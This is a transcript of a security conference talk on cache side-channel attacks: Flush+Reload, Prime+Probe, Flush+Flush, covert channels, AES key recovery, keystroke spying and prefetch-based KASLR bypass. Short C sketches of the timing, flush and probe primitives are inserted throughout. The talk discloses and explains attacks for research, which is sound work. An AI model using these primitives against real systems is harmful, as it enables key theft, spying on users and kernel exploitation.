Music
Herald Angel: We are here with a motto, and the motto of this year is "Works For Me", and I think... how many people in here are programmers? Raise your hands or shout or... Whoa, that's a lot. Okay. So I think many of you work on x86. Yeah. And I think you assume that it works, and that everything works as intended. And I mean: what could go wrong? Our next talk, the first one today, will be by Clémentine Maurice, who previously was here with Rowhammer.js, something I would call scary, and Moritz Lipp, who has worked on the ARMageddon exploit. Okay, so next I would like to hear a really warm applause for the speakers of the talk "What could possibly go wrong with <insert x86 instruction here>?" Thank you.
Applause
Clémentine Maurice (CM): Well, thank you all for being here this morning. Yes, this is our talk "What could possibly go wrong with <insert x86 instruction here>?". Just a few words about ourselves: I'm Clémentine Maurice, I got my PhD in computer science last year, and I'm now working as a postdoc at Graz University of Technology in Austria. You can reach me on Twitter or by email, and there's also, I think, lots of time before the Congress is over.
Moritz Lipp (ML): Hi, my name is Moritz Lipp, I'm a PhD student at Graz University of Technology, and you can also reach me on Twitter, or just after our talk in the next days.
CM: So, about this talk: the title says this is a talk about x86 instructions, but this is not a talk about software. Don't leave yet! I'm actually even assuming safe software, and the point that we want to make is that safe software does not mean safe execution: we have information leakage because of the underlying hardware, and this is what we're going to talk about today. So we'll be talking about cache attacks: what they are, what we can do with them, and also a special kind of cache attack that we found this year, doing cache attacks without memory accesses, and how to use that even to bypass kernel ASLR.
So again, the title says this is a talk about x86 instructions, but it's even more general than that: we can also mount these cache attacks on ARM, not only on x86, so some of the examples that you will see also apply to ARM. Today we'll have a bit of background, but actually most of the background will come along the way, because this covers a really huge chunk of our research. We'll see mainly three instructions: "mov", and how we can perform these cache attacks and what they are; "clflush", where we'll be doing cache attacks without any memory accesses; then "prefetch", and how we can bypass kernel ASLR and lots of translation levels; and then there's even a bonus track, which will not be our own work, but even more instructions and even more attacks.
Okay, so let's start with a bit of an introduction. We will be mainly focusing on Intel CPUs, and this is roughly how it looks today in terms of cores and caches. We have different cores, so here four cores, and different levels of caches, usually three levels. We have level 1 and level 2, which are private to each core, which means that core 0 can only access its own level 1 and level 2, and not the level 1 and level 2 of, for example, core 3. And we have the last-level cache, so here, if you can see the pointer: this one is divided into slices, and we have as many slices as cores, so here 4 slices, but all the slices are shared across cores, so core 0 can access the whole last-level cache, slices 0, 1, 2 and 3. We also have a nice property on Intel CPUs, which is that this last level of cache is inclusive. What it means is that everything that is contained in level 1 and level 2 will also be contained in the last-level cache, and this will prove to be quite useful for cache attacks.
Today we mostly have set-associative caches. What it means is that data is loaded into a specific set, which depends only on its address: some bits of the address give us the index that says "okay, the line is going to be loaded in this cache set". Then we have several ways per set, so here we have 4 ways, and the cache line is going to be loaded into a specific way, which only depends on the replacement policy and not on the address itself. When you load a line into the cache, usually the cache is already full and you have to make room for a new line. This is what the replacement policy does: it says "okay, I'm going to remove this line to make room for the next line."
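(As a concrete illustration, here is a minimal sketch of set indexing, ours rather than from the talk: with 64-byte lines, the low 6 address bits are the offset inside the line, and the next bits select the set. The cache geometry, an 8-way 32 KB L1 with 64 sets, is an assumption for the example.)

```c
#include <stdint.h>
#include <stdio.h>

#define LINE_SIZE 64   /* bytes per cache line */
#define NUM_SETS  64   /* 32 KB / (64 B per line * 8 ways) = 64 sets */

/* Set index of an address in a hypothetical 8-way 32 KB L1 cache. */
static unsigned cache_set(uintptr_t addr) {
    return (addr / LINE_SIZE) % NUM_SETS;   /* address bits 6..11 */
}

int main(void) {
    uintptr_t a = (uintptr_t)0x7f1234567940ULL;
    printf("address %#lx maps to set %u\n", (unsigned long)a, cache_set(a));
    return 0;
}
```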
So for today we're going to see only three instructions, as I've been telling you. The mov instruction: it does a lot of things, but the only aspect we're interested in is that it can access data in main memory. We're going to see clflush: what it does is remove a cache line from the cache, from the whole cache. And we're going to see prefetch, which prefetches a cache line for future use. We're going to see what they do, the kind of side effects they have, and all the attacks that we can do with them. And that's basically all the examples you need for today, so even if you're not an expert in x86, don't worry, it's not just slides full of assembly and stuff. Okay, so on to the first one.
ML: So we will first start with the mov instruction, and actually the first slide is full of code. As you can see, the mov instruction is used to move data from registers to registers, from main memory and back to main memory, and there are many movs you can use, but basically it's just to move data, and that's all we need to know. In addition, a lot of exceptions can occur, so you might assume that the checks are so tight that nothing can go wrong when you just move data, because moving data is simple.
However, whatever exceptions there are, the data that is accessed is always loaded into the cache. This is transparent to the program that is running, but there are side effects when you run these instructions, and we will see what they look like with the mov instruction. You probably all know that data can either be in CPU registers, in the different levels of the cache that Clémentine showed you earlier, in main memory, or on disk, and depending on where the data is located, it takes longer to be loaded back to the CPU. This is what we can see in this plot: we measure the access time of an address over and over again, assuming that when we access it more often, it is already stored in the cache. So most of the time, when we load an address and it takes around 70 cycles, we can assume it is loaded from the cache. When the data is loaded from main memory instead, we can clearly see that it takes much longer, a bit more than 200 cycles.
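(In code, such a timed access can look like the following minimal sketch, our illustration rather than the speakers' exact code, assuming GCC/Clang on x86-64 with <x86intrin.h>; the cycle counts are machine-dependent.)

```c
#include <stdint.h>
#include <x86intrin.h>

/* Time a single access to *p in cycles, serialized with rdtscp. */
static inline uint64_t timed_access(volatile uint8_t *p) {
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    (void)*p;                        /* the mov we are timing */
    return __rdtscp(&aux) - start;   /* ~70 cycles: cache hit; ~200+: miss */
}
```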
And this property is what we can exploit using cache attacks: we measure the timing differences on memory accesses. What an attacker does is monitor the cache lines, but he has no way to know what the content of a cache line actually is. So we can only monitor that a cache line has been accessed, not what is actually stored in it. What you can do with this is implement covert channels, so you can allow two processes to communicate with each other, evading the permission system, as we will see later on. In addition, you can also do side-channel attacks, so you can spy with a malicious application on benign processes, and you can use this to steal cryptographic keys or to spy on keystrokes.
Basically, we have different types of cache attacks, and I want to explain the most popular one, the "Flush+Reload" attack, first. On the left, you have the address space of the victim, and on the right you have the address space of the attacker, who maps a shared library, an executable that the victim is using, into its own address space, like the red rectangle. This means that when this data is stored in the cache, it's cached for both processes. Now the attacker can use the flush instruction to remove the data from the cache, so it's not in the cache anymore, which means it's also not cached for the victim. Now the attacker lets the victim be scheduled, and if the victim decides "yeah, I need this data", it will be loaded back into the cache. Then the attacker can reload the data, measure how long it took, and decide: "okay, the victim has accessed the data in the meantime" or "the victim has not accessed the data in the meantime". By that, you can spy on whether this address has been used.
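(A minimal sketch of one Flush+Reload round, our illustration under the same assumptions as before; the threshold is hypothetical and has to be calibrated per machine.)

```c
#include <stdint.h>
#include <x86intrin.h>

#define HIT_THRESHOLD 120   /* illustrative hit/miss boundary in cycles */

/* One Flush+Reload round on an address shared with the victim:
 * returns 1 if the victim accessed it since the previous flush. */
static int flush_reload(volatile uint8_t *shared) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*shared;                       /* reload */
    uint64_t dt = __rdtscp(&aux) - t0;
    _mm_clflush((const void *)shared);   /* flush again for the next round */
    return dt < HIT_THRESHOLD;           /* fast reload means it was cached */
}
```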
The second type of attack is called "Prime+Probe", and it does not rely on shared memory like the "Flush+Reload" attack. It works as follows: instead of mapping anything into its own address space, the attacker loads a lot of data into one cache set, here, and fills it. Now he again lets the victim be scheduled, and the victim can access data that maps to the same cache set. So the cache set is used by the attacker and the victim at the same time. Now the attacker can measure the access time to the addresses he loaded into the cache before: when he accesses an address that is still in the cache, it's faster, so he measures a lower time, and if it's not in the cache anymore, it has to be reloaded, so it takes longer. He can sum this up and detect whether the victim has loaded data into the cache as well. So the first thing we want to show you, which you can do with cache attacks, is implementing a covert channel, and this could happen in the following scenario.
You install an app on your phone to view your favorite images and apply some filters, and you don't know that it's malicious, because the only permission it requires is access to your images, which makes sense. So you can easily install it without any fear. In addition, you want to know what the weather is outside, so you install a nice little weather widget, and the only permission it has is internet access, because it has to load the information from somewhere. Now, what happens if you're able to implement a covert channel between these two applications, without any permissions and privileges, so that they can communicate with each other without using any mechanism provided by the operating system, so it's hidden? It can happen that the gallery app sends the image to the internet, where it will be uploaded and exposed for everyone. So maybe you don't want to see the cat picture everywhere.
While we can do this with both the Prime+Probe and Flush+Reload attacks, we will discuss a covert channel using Prime+Probe. So how can we transmit this data? We need to transmit ones and zeros at some point. The sender and the receiver agree on one cache set that they both use, and the receiver probes the set all the time. When the sender wants to transmit a zero, he just does nothing, so the lines of the receiver stay in the cache all the time, and the receiver knows "okay, he's sending nothing", so it's a zero. On the other hand, if the sender wants to transmit a one, he starts accessing addresses that map to the same cache set, so it takes a longer time for the receiver to access its addresses again, and he knows "okay, the sender just sent me a one". And Clémentine will show you what you can do with this covert channel.
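(The receiver side of such a channel could look like the following sketch, again our own hedged illustration: addrs[] is assumed to hold one address per way, all mapping to the agreed cache set, and the threshold is hypothetical.)

```c
#include <stdint.h>
#include <x86intrin.h>

#define WAYS 4              /* ways of the agreed cache set           */
#define ONE_THRESHOLD 400   /* illustrative probe-time cutoff, cycles */

/* Probe the agreed set: a slow probe means the sender evicted our
 * lines by accessing the set, i.e. a 1 was transmitted. */
static int receive_bit(volatile uint8_t *addrs[WAYS]) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    for (int i = 0; i < WAYS; i++)
        (void)*addrs[i];                 /* reload our priming lines */
    return __rdtscp(&aux) - t0 > ONE_THRESHOLD;
}
```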
CM: So the really nice thing about Prime+Probe is that it has really low requirements: it doesn't need any kind of shared memory. For example, if you have two virtual machines, you could have some shared memory via memory deduplication; the thing is that this is highly insecure, so cloud providers like Amazon EC2 disable it. But we can still use Prime+Probe, because it doesn't need this shared memory. Another problem with cache covert channels is that they are quite noisy. When other applications are also running on the system, they are all competing for the cache, and they might evict some cache lines, especially if it's an application that is very memory-intensive. You also have noise due to the fact that the sender and the receiver might not be scheduled at the same time: if the sender sends all the data while the receiver is not scheduled, then part of the transmission gets lost. So what we did is we tried to build an error-free covert channel. We took care of all these noise issues by using error detection to resynchronize the sender and the receiver, and then error correction to correct the remaining errors. So we managed to have a completely error-free covert channel, even with a lot of noise, let's say another virtual machine on the same machine serving files through a web server and doing lots of memory-intensive tasks at the same time. The covert channel stayed completely error-free, at around 40 to 75 kilobytes per second, which is still quite a lot.
All of this is between virtual machines on Amazon EC2. And the really neat thing, because we wanted to do something with that, is that we managed to create an SSH connection really over the cache: the machines don't have any network between them, we are just sending the zeros and the ones, and we have an SSH connection between them. So you could say that cache covert channels are nothing serious, but I think this is a real threat. If you want more details about this work in particular, it will be published soon at NDSS.
The second application that we wanted to show you is that we can attack crypto with cache attacks. In particular, we are going to show an attack on AES, on a special implementation of AES that uses T-tables. That's the fast software implementation, because it uses precomputed lookup tables. It's known to be vulnerable to side-channel attacks since 2006, by Osvik et al., and it's a one-round known-plaintext attack. So you have p, your plaintext, and k, your secret key, and the AES algorithm computes an intermediate state at each round r. In the first round, the accessed table indices are just p XOR k (for each byte i, the index is p_i ⊕ k_i). Now, it's a known-plaintext attack, and what this means is that if you can recover the accessed table indices, you have also managed to recover the key, because it's just a XOR. So that would be bad, right, if we could recover these accessed table indices? Well, we can, with cache attacks! So we did that with Flush+Reload and with Prime+Probe.
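(The key-recovery relation itself is one line of code; in this sketch of ours, observed_idx is the table index inferred from a cache hit. Note that with 64-byte lines holding 16 four-byte T-table entries, a cache line only resolves the upper four bits of each index, and hence of each key byte.)

```c
#include <stdint.h>

/* First-round T-table relation: index = p ^ k, so k = p ^ index.
 * Intersecting candidates over many known plaintexts leaves only
 * the true key byte (up to the bits a cache line can resolve). */
static uint8_t key_candidate(uint8_t plaintext_byte, uint8_t observed_idx) {
    return plaintext_byte ^ observed_idx;
}
```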
On the x-axis you have the plaintext byte values, and on the y-axis you have the addresses, which are essentially the T-table entries. A black cell means that we monitored the cache line and saw a lot of cache hits: basically, the blacker it is, the more certain we are that the T-table entry has been accessed. Here it's a toy example, the key is all zeros, but you would just have a different pattern if the key was not all zeros, and as long as you can see this nice diagonal, or a pattern, you have recovered the key. So it's an old attack, 2006, it's been 10 years, everything should be fixed by now, and you see where I'm going: it's not. On Android, the Bouncy Castle implementation uses the T-tables by default, so that's bad. Also, many implementations that you can find online use precomputed values, so be wary of this kind of attack. The last application we wanted to show you is how we can spy on keystrokes.
For that, we will use Flush+Reload, because it's a really fine-grained attack: we can see very precisely which cache line has been accessed, and a cache line is only 64 bytes, so it's really not a lot. We're going to use that to spy on keystrokes, and we even have a small demo for you.
ML: What you can see on the screen is not Intel x86, it's a smartphone, a Galaxy S6, but you can also apply these cache attacks there, and that's what we want to emphasize. On the left you see the screen, and on the right we have connected a shell with no privileges and permissions, so it could basically be an app that you install from the app store.
sound of glass bottle falling
On the right we are going to start our spy tool, and on the left we just open the messenger app, and whenever the user hits any key on the keyboard, our spy tool notices that. If he presses the spacebar, we can also measure that. If the user decides "okay, I want to delete the word" because he changed his mind, we can also register that the user pressed the backspace button. So in the end, we can see exactly how long the words were that the user typed into his phone, without any permissions and privileges, which is bad.
laughs
applause
ML: So, enough about the mov instruction, let's head to clflush.
CM: So, the clflush instruction: what it does is invalidate, from every cache level, the cache line that contains the address that you pass to it. In itself it's kind of bad, because it enables the Flush+Reload attacks that we showed earlier: that was just flush, reload, and the flush part is done with clflush. But there's actually more to it, how wonderful. There's a first timing leakage with it: we're going to see that the clflush instruction has a different timing depending on whether the data that you pass to it is cached or not. Imagine you have a cache line that is in level 1; by the inclusion property, it also has to be in the last-level cache. Now, this is quite convenient, and this is also why we have this inclusion property on Intel CPUs, for performance reasons: if you want to see whether a line is present at all in the cache, you just have to look in the last-level cache. This is basically what the clflush instruction does. It goes to the last-level cache, sees "okay, there's a line, I'm going to flush this one", and then there's something that says the line is also present somewhere else, so it flushes the line in level 1 and/or level 2. So that's slow. Now, if you perform clflush on some data that is not cached, it basically does the same: it goes to the last-level cache, sees that there's no line, and since this data can't be anywhere else in the cache (it would be in the last-level cache if it were anywhere), it does nothing and stops there. So that's fast.
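(Measuring this is the same timing pattern as before, just around the flush itself; a minimal sketch of ours:)

```c
#include <stdint.h>
#include <x86intrin.h>

/* Time one clflush: flushing a cached line takes a few cycles
 * longer than flushing an uncached one, and that is the leak. */
static uint64_t timed_clflush(const void *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    _mm_clflush(p);
    return __rdtscp(&aux) - t0;
}
```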
So how fast and how slow exactly am I talking about? It's actually only a very few cycles. We did these experiments on different microarchitectures, Sandy Bridge, Ivy Bridge and Haswell, and the different colors correspond to the different microarchitectures. The first thing that is already kind of funny is that you can distinguish the microarchitectures quite nicely with this, but the real point is that you have two really different zones. The solid line is when we measured clflush on a line that was already in the cache, and the dashed line is when the line was not in the cache, and on all microarchitectures you can see a difference. It's only a few cycles, it's a bit noisy, so what could go wrong?
Okay, so, exploiting these few cycles, we still managed to perform a new cache attack that we call "Flush+Flush". Basically, everything that we could do with "Flush+Reload", we can also do with "Flush+Flush": we can build covert channels and side-channel attacks. It's stealthier than previous cache attacks, and I'm going to come back to this, and it's also faster than previous cache attacks. So how does it work exactly? The principle is a bit similar to "Flush+Reload": we have the attacker and the victim, which have some kind of shared memory, let's say a shared library, and it will be shared in the cache. The attacker starts by flushing the cache line, then lets the victim perform whatever it does, let's say an encryption; the victim will load some data into the cache, automatically. Now the attacker wants to know again whether the victim accessed this precise cache line, and instead of reloading it, he is going to flush it again. Since we have this timing difference depending on whether the data is in the cache or not, it gives us the same information as if we had reloaded it, except it's way faster.
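(One round of it, as a hedged sketch of ours; the flush doubles as both probe and reset, so the attacker never performs a memory access. The threshold is hypothetical, sitting between the two clflush timings measured above.)

```c
#include <stdint.h>
#include <x86intrin.h>

#define CACHED_THRESHOLD 140   /* illustrative; calibrate per machine */

/* One Flush+Flush round: returns 1 if the victim had cached the line. */
static int flush_flush(const void *shared) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    _mm_clflush(shared);                  /* probe and reset in one step */
    return __rdtscp(&aux) - t0 > CACHED_THRESHOLD;  /* slow flush: cached */
}
```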
So, I talked about stealthiness. The thing is that these cache attacks, and that also applies to Rowhammer, are already stealthy in themselves, because there's no antivirus today that can detect them. But some people thought that we could detect them with performance counters, because of the many cache misses and cache references that happen when the data is flushed and when you re-access memory. Now, what we thought is: yes, but cache attacks are not the only programs that cause lots of cache misses and cache references, so we would like a better metric. These cache attacks have a very heavy activity on the cache, but they are also very particular, because they are very short loops of code: if you take Flush+Reload, you just flush one line, reload the line, and then again flush and reload. That's a very short loop, and it creates very low pressure on the instruction TLB, which is quite particular to cache attacks. So what we decided to do is normalize the cache events, the cache misses and cache references, by events that have to do with the instruction TLB, and with that we managed to detect cache attacks and Rowhammer without having false positives. So this is the stealthiness metric that I'm going to use when I talk about stealthiness.
So we started by creating a covert channel. First we wanted to have it as fast as possible, so we created a protocol to evaluate all the kinds of cache attacks that we had, Flush+Flush, Flush+Reload and Prime+Probe, and we started with a packet size of 28, which doesn't really matter. We measured the capacity of our covert channel: Flush+Flush is around 500 kB/s, whereas Flush+Reload was only 300 kB/s, so Flush+Flush is already quite an improvement in speed. Then we measured the stealthiness: at this speed, only Flush+Flush was stealthy. Now, Flush+Flush and Flush+Reload, as you've seen, have some similarities: for a covert channel they also share the same sender, only the receiver is different, and for this one the sender was not stealthy for either of them. Anyway, if you want a fast covert channel, just try Flush+Flush, that works.
Now let's try to make it completely stealthy, because if the sender is not stealthy, it may give away the whole attack. So we said: okay, maybe if we just slow down all the attacks, there will be fewer cache hits and cache misses, and then maybe all the attacks are actually stealthy, why not? So we tried that: we slowed down everything, so Flush+Reload and Flush+Flush are around 50 kB/s now; Prime+Probe is a bit slower, because it takes more time to prime and probe everything. But still, even with this slowdown, only Flush+Flush has its receiver stealthy, and we also managed to have the sender stealthy now. So basically, whether you want a fast covert channel or a stealthy covert channel, Flush+Flush is really great.
Now we also wanted to evaluate whether it wasn't too noisy to perform side-channel attacks, so we did the side channel on the AES T-table implementation, the attack that we showed you earlier. We counted the number of encryptions that we need to determine the upper four bits of a key byte, so here, the lower, the better the attack. Flush+Reload is a bit better: we need only 250 encryptions to recover these bits, but Flush+Flush comes quite close with 350, and Prime+Probe is actually the noisiest of them all, needing close to 5000 encryptions. So we have around the same performance for Flush+Flush and Flush+Reload.
Now let's evaluate the stealthiness again. What we did here is perform 256 billion encryptions in a synchronous attack, so we really had the spy and the victim synchronized, and we evaluated the stealthiness of them all, and here, again, only Flush+Flush is stealthy. And while you can always slow down a covert channel, you can't actually slow down a side channel, because in a real-life scenario you're not going to say: "Hey victim, wait for me a bit, I'm trying to do an attack here." That won't work.
So there's even more to it, but I need a bit more background before continuing. I've shown you the different levels of caches, and here I'm going to focus on the last-level cache. We have our four slices here, this is the last-level cache, and we have some bits of the address that correspond to the set. But more importantly, we need to know in which slice an address is going to be, and that is given by some bits of the address that are passed into a function that says in which slice the line is going to be.
Now, the thing is that this hash function is undocumented by Intel; it wouldn't be fun otherwise. So we have this: as many slices as cores, and an undocumented hash function that maps a physical address to a slice. While it's actually a bit of a pain for attacks, it was not originally designed for security but for performance, because you want all the accesses to be evenly distributed across the different slices. So what the hash function does is take some bits of the physical address and output k bits of slice index: just one bit if you have a two-core machine, two bits if you have a four-core machine, and so on. Now let's go back to clflush and see what the relation with that is.
The thing that we noticed is that clflush is actually faster to reach a line on the local slice. If you always flush the same line, and you run your program on core 0, core 1, core 2 and core 3, you will observe that on one core in particular the clflush is faster. Here, this is on core 1, and you can see that on cores 0, 2 and 3 it's a bit slower. Since we ran the program on core 1 and always flushed the same line, we can deduce that the line belongs to slice 1. And what we can do with that is map physical addresses to slices. That's one way to reverse-engineer this addressing function that was not documented.
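(For intuition: the reverse-engineered functions typically come out as XORs of fixed sets of physical-address bits, one parity per slice bit. The sketch and the mask below are purely illustrative assumptions of ours, not the actual Intel function, which varies per microarchitecture.)

```c
#include <stdint.h>

/* Hypothetical slice hash for a 2-core part: one slice bit computed
 * as the parity of the physical address ANDed with a fixed mask.
 * The mask here is made up for illustration. */
#define SLICE_MASK 0x3a5f575440ULL

static unsigned slice_of(uint64_t paddr) {
    return __builtin_parityll(paddr & SLICE_MASK);   /* GCC/Clang builtin */
}
```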
Funnily enough, that's not the only way: what I did before that was using performance counters to reverse-engineer this function, but that's actually a whole other story, and if you want more details on that, there's also an article about it.
ML: So the next instruction we want to talk about is the prefetch instruction. The prefetch instruction is used to tell the CPU: "Okay, please load the data I need later on into the cache, if you have some time." There are actually six different prefetch instructions, prefetcht0 to t2 and others, which mean: "CPU, please load the data into the first-level cache", or into the last-level cache, whatever you want to use, but we'll spare you the details, because they're not so interesting in the end.
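(In compiler-intrinsic form, a prefetch hint looks like this; a trivial sketch:)

```c
#include <x86intrin.h>

/* Ask the CPU to pull *p into the caches (T0 hints "all levels"). */
static void warm(const void *p) {
    _mm_prefetch((const char *)p, _MM_HINT_T0);
}
```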
However, what's more interesting is when we take a look at the Intel manual and what it says there. So: "Using the PREFETCH instruction is recommended only if data does not fit in the cache." So you can tell the CPU: "Please load the data I want to stream into the cache, so it's more performant." "Use of software prefetch should be limited to memory addresses that are managed or owned within the application context." So one might wonder what happens if the address is not managed by myself. Sounds interesting. "Prefetching to addresses that are not mapped to physical pages can experience non-deterministic performance penalty. For example specifying a NULL pointer as an address for prefetch can cause long delays." So we don't want to do that, because our program would be slow. So let's take a look at what they mean by non-deterministic performance penalty, because we want to write good software, right? But before that, we have to look at a little more background information to understand the attacks.
On modern operating systems, every application has its own virtual address space, so at some point the CPU needs to translate these addresses to the physical addresses actually in the DRAM. For that, we have this very complex-looking data structure. We have a 48-bit virtual address, and some of those bits map to a table, like the PML4, the page map level 4 table, with 512 entries, so depending on those bits the CPU knows at which entry it has to look. If there is data there, because the address is mapped, it can proceed and look at the page directory pointer table, and so on down the levels. It's the same for each level, until you come to the page table, where you have the 4-kilobyte pages. So it's in the end not that complicated, but it's a bit confusing, because you want to know a physical address, and you have to look it up somewhere in main memory, with physical addresses, to translate your virtual addresses. And if you have to go through all those levels, it takes a long time, so we can do better than that, and that's why Intel introduced additional caches for all of those levels. So if you want to translate an address, you take a look at the ITLB for instructions and the data TLB for data. If it's there, you can stop; otherwise you go down all those levels, and if it's not in any cache, you have to look it up in the DRAM.
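(The bit layout behind this walk is fixed for 48-bit virtual addresses with 4 KB pages: 9 index bits per level plus a 12-bit page offset. A small sketch of ours that just extracts the indices:)

```c
#include <stdint.h>
#include <stdio.h>

/* 9-bit table index at a given bit position of a virtual address. */
#define IDX(va, shift) (((va) >> (shift)) & 0x1ffULL)

int main(void) {
    uint64_t va = 0x00007f0012345678ULL;
    printf("PML4 %llu, PDPT %llu, PD %llu, PT %llu, offset 0x%llx\n",
           (unsigned long long)IDX(va, 39),   /* bits 47..39 */
           (unsigned long long)IDX(va, 30),   /* bits 38..30 */
           (unsigned long long)IDX(va, 21),   /* bits 29..21 */
           (unsigned long long)IDX(va, 12),   /* bits 20..12 */
           (unsigned long long)(va & 0xfff)); /* bits 11..0  */
    return 0;
}
```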
In addition, the address space is shared: on the one hand you have the user memory, and on the other hand the kernel is mapped into the same address space, for convenience and performance. If your user program wants some kernel functionality, like reading a file, it switches to the kernel memory, there's a privilege escalation, and then it can read the file, and so on. However, you have drivers in the kernel, and if you know the addresses of those drivers, you can do code-reuse attacks. As a countermeasure, address space layout randomization was introduced, also for the kernel. This means that when you have your program running, the kernel is mapped at one address, and if you reboot the machine, it's not at the same address anymore but somewhere else. So if there is a way to find out at which address the kernel is loaded, you have circumvented this countermeasure and defeated kernel address space layout randomization. This would be nice for some attacks. In addition, there's also the kernel direct physical map. What does this mean? It's implemented on many operating systems, like OS X, Linux, also the Xen hypervisor and BSD, but not on Windows. What it means is that the complete physical memory is additionally mapped into the kernel memory at a fixed offset. So for every page that is mapped in user space, there is something like a twin page in the kernel memory, which you can't access, because it's in the kernel memory.
However, we will need it later, because now we go back to prefetch and see what we can do with it. Prefetch is not a usual instruction, because it just tells the CPU: "I might need that data later on; if you have time, load it for me." If not, the CPU can ignore it, because it's busy with other stuff. So there's no guarantee that this instruction is really executed, but most of the time it is. An interesting thing is that it generates no faults: whatever you pass to this instruction, your program won't crash. And it does not check any privileges, so I can also pass a kernel address to it, and it won't say "No, stop, you accessed an address that you are not allowed to access, so I crash"; it just continues, which is nice. The second interesting thing is that the operand is a virtual address, so every time you execute this instruction, the CPU has to check which physical address this virtual address corresponds to. It has to do the lookup with all those tables we've seen earlier, and as you have probably guessed already, the execution time varies for the prefetch instruction too, and we will see later on what we can do with that.
So, let's get back to the direct physical map, because we can create an oracle for address translation: we can find out which physical address belongs to a virtual address. Nowadays you don't want the user to know that, because with this information you can craft nice Rowhammer attacks, and more advanced cache attacks, so this information is restricted from the user. But let's check if we can find a way to still get it. As I told you earlier, if you have a page mapped in user space, you have the twin page in kernel space, and if it's cached, it's cached for both of them. So the attack works as follows: as the attacker, you flush your user-space page, so it's not in the cache, not for the kernel memory either. Then you call prefetch on the address in the kernel, because, as I told you, you can still do that, since it doesn't create any faults. So you tell the CPU: "Please load this data into the cache, even if I don't normally have access to it." If we now access our user-space page again and measure a cache hit, because the data has been loaded into the cache by the CPU, we know exactly which position the address we passed corresponds to. And because the direct map is at a fixed offset, we can just do a simple subtraction and get the physical address. So we have a nice way to find physical addresses for virtual addresses.
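(A hedged sketch of this translation oracle, ours rather than the speakers' code: DIRECT_MAP_BASE is the historic Linux direct-map offset, used here purely as an illustration, and the threshold is hypothetical.)

```c
#include <stdint.h>
#include <x86intrin.h>

#define DIRECT_MAP_BASE 0xffff880000000000ULL  /* illustrative offset  */
#define HIT_THRESHOLD   120                    /* calibrate per machine */

/* Returns 1 if paddr_guess is the physical address behind user page p. */
static int translation_oracle(volatile uint8_t *p, uint64_t paddr_guess) {
    unsigned aux;
    _mm_clflush((const void *)p);                 /* 1. flush user copy   */
    const char *twin = (const char *)(uintptr_t)(DIRECT_MAP_BASE + paddr_guess);
    _mm_prefetch(twin, _MM_HINT_T0);              /* 2. prefetch the twin */
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;                                     /* 3. time user access  */
    return __rdtscp(&aux) - t0 < HIT_THRESHOLD;   /* hit: guess correct   */
}
```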
In practice, this looks like the following plot. It's pretty simple, because we just do this for every address, and at some point we measure a cache hit. There's a huge difference, and exactly at this point we know which physical address corresponds to our virtual address. The second thing we can exploit is the timing difference of the prefetch instruction itself. As I told you, when you go down the translation levels, at some point the CPU sees "it's here" or "it's not here", so it can abort early. And with that, we can know exactly when the prefetch instruction aborted, and thus how the pages are mapped into the address space.
So, the timing depends on where the translation stops. Using those two properties and that information, we can do the following. On the one hand, we can build variants of cache attacks: instead of Flush+Reload, we can do Flush+Prefetch, for instance. We can also use prefetch to mount Rowhammer attacks on privileged addresses, because it doesn't fault when we pass those addresses, and it works as well. In addition, we can use it to recover the translation levels of a process, which you could do earlier with the pagemap file, but, as I told you, that is now privileged, so you don't have access to it, and by doing that you can bypass address space layout randomization. In addition, as I told you, you can translate virtual addresses to physical addresses, which is now also privileged with the pagemap file, and using that re-enables ret2dir exploits, which were demonstrated last year. On top of that, we can also use this to locate kernel drivers, as I told you. It would be nice if we could circumvent KASLR as well, and I will show you now how this is possible.
With the first oracle, we find out all the pages that are mapped. For each of those pages, we evict the translation caches, which we can do either by calling sleep, which schedules another program, or by accessing a large memory buffer. Then we perform a syscall to the driver, so code of the driver is executed and loaded into the cache, and then we just measure the time prefetch takes on this address. In the end, the fastest average access time is the driver page.
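(Sketched in code, with heavy assumptions on our side: the eviction and the driver syscall are only indicated as comments, the region bounds are placeholders, and timed_prefetch works because prefetch never faults, even on kernel addresses.)

```c
#include <stdint.h>
#include <x86intrin.h>

/* Time one prefetch; safe on arbitrary (even kernel) addresses. */
static uint64_t timed_prefetch(uintptr_t addr) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    _mm_prefetch((const char *)addr, _MM_HINT_T0);
    return __rdtscp(&aux) - t0;
}

/* Scan candidate driver pages: the page with the fastest average
 * prefetch time right after a driver syscall is the driver page. */
static uintptr_t find_driver(uintptr_t lo, uintptr_t hi) {
    uintptr_t best_addr = 0;
    uint64_t best = UINT64_MAX;
    for (uintptr_t a = lo; a < hi; a += 4096) {
        uint64_t sum = 0;
        for (int i = 0; i < 64; i++) {
            /* evict translation caches (sleep or touch a big buffer),
               then issue a syscall handled by the target driver */
            sum += timed_prefetch(a);
        }
        if (sum < best) { best = sum; best_addr = a; }
    }
    return best_addr;
}
```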
We can mount this attack on Windows 10 in less than 12 seconds. So we can defeat KASLR in less than 12 seconds, which is very nice. In practice, the measurements look like the following: we have a lot of long measurements, and at some point there is a low one, and you know exactly that this is the driver region, and the address where the driver is located. And you can mount those ret2dir attacks again. However, that's not everything, because there are more instructions on Intel.
CM: Yeah, so the following is not our work, but we thought it would be interesting, because it's basically more instructions, more attacks, more fun. There's the RDSEED instruction: what it does is request a random seed from the hardware random number generator. The thing is that there is a fixed number of precomputed random bits, and it takes time to regenerate them. So, like everything that takes time, you can create a covert channel with that. There are also FADD and FMUL, which are floating-point operations; here, the running time of the instruction depends on the operands. Some people managed to bypass Firefox's same-origin policy with an SVG filter timing attack using that. There are also the JMP instructions: in modern CPUs you have branch prediction and branch target prediction. With that, and it's actually been studied a lot, you can create a covert channel, you can do side-channel attacks on crypto, and you can also bypass KASLR. And finally, there are the TSX instructions, an extension for hardware transactional memory support, which has also been used to bypass KASLR. So, in case you're not sure: KASLR is dead. You have lots of different things to read.
Okay, so on to the conclusion. As you've seen, it's actually more a problem of CPU design than really of the instruction set architecture. The thing is that all these issues are really hard to patch: they are all linked to performance optimizations, and we are not getting rid of performance optimizations. It's basically a trade-off between performance and security, and performance seems to always win. There have been some proposals against cache attacks, let's say removing the clflush instruction. The thing is that all these quick fixes won't work, because we always find new ways to do the same thing without these precise instructions, and we also keep finding new instructions that leak information. So it's really quite a big topic, how to fix this. Thank you very much for your attention. If you have any questions, we'd be happy to answer them.
applause
